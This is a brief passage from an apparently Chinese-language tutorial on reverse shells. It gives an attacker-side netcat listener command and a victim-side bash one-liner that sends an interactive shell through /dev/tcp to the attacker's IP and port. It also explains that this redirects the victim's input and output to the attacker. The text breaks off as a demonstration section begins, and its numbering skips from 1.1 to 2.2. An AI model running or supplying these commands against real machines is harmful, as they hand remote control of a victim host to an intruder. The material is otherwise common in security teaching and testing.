1. 过程 1.1 攻击者(attacker)主机监听本地端口 nc -lvp $port 2.2 受害者(victim)主机执行反弹shell命令 bash -i >& /dev/tcp/$attacker_ip/$port 0>&1 作用:将受害者(victim)主机的标准输入、标准输出、错误输出全都重定向到攻击者(attacker)主机上 2. 演示 2.1 攻击者(attacker